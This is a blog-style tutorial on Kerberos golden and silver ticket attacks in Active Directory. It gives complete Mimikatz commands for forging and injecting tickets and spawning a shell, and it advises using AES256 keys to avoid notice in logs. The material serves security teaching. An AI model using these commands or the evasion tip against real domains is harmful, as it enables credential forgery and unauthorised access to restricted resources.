If you're in the realm of cybersecurity, you're probably already aware of the fact that most if not all processes and architectures are vulnerable to something, some more than others. In this post, we'll be diving into some Kerberos attacks that can result in undesired authentication and therefore access to restricted resources in an active directory environment.
Prerequisites to Golden and Silver Ticket Attacks
Prior to executing each of these attacks, there's information you need in order to successfully execute them. You can perceive these requirements to be "recipes," where you need certain ingredients to bake the nefarious authentication cake. In order to acquire these ingredients, Mimikatz will be your friend. Specifically, using the sekurlsa::ekeys module will provide you access to the data you need to carry on with forging tickets. Note that to utilize that module you will require elevated privileges.
This post won't dive into the initial compromise or gaining access, but will rather focus on the information needed and the how-to of golden and silver ticket attacks.
Golden Ticket Attack
In a golden ticket attack, the attacker compromises the Kerberos authentication process by forging a ticket granting ticket (TGT). In the authentication process, the TGT is an authentication token that allows the user to request additional accesses (service tickets) by way of the ticket granting service (TGS). These additional accesses are to services and resources on the active directory network.
In order to forge a TGT, the following is required:
The AES256 encrypted key or RC4 encrypted key for the krbtgt account (AES256 is preferred; stands out less in the logs)
The domain SID
The domain name
The user account being impersonated
Once that information is acquired, use Mimikatz to perform the attack:
mimikatz # kerberos::golden /User:Matryoshka /domain:atomicmatryoshka.local /sid:S-1-5-21-1234567890-0987654321-123456789 /id:500 /aes256:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 /startoffset:0 /endin:600 /renewmax:10080 /pttThe ticket is now in memory, you can run the following command to spawn a cmd shell:
mimikatz # misc::cmdOnce the command prompt is up, you will be able to remote into and access resources you were previously unable to access.
Silver Ticket Attack
In a silver ticket attack, the attacker compromises the latter part of the Kerberos authentication process by being able to forge ticket granting service (TGS) tickets. While a golden ticket attack allows the attacker to access an unlimited number of resources across the domain, a silver ticket attack allows the attacker to access a specific service/resource on the domain.
In order to forge a TGS ticket, the following is required:
The domain SID
The domain name
The user account being impersonated
The target server
The target service name
The AES256 encrypted or RC4 encrypted hash of the machine account password
Once that information is acquired, use Mimikatz to perform the attack:
mimikatz# kerberos::golden /User:Matryoshka /domain:atomicmatryoshka.local /sid:S-1-5-21-1234567890-0987654321-123456789/aes256:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 /target:atomic-dc.atomicmatryoshka.local /service:cifs /startoffset:0 /endin:600 /renewmax:10080 /pttThe ticket is now in memory, you can now spawn a cmd shell to access the service/resource:
mimikatz# misc::cmdOnce the command prompt is up, you can access the resource you specified in the initial portion of the attack.
Comentarios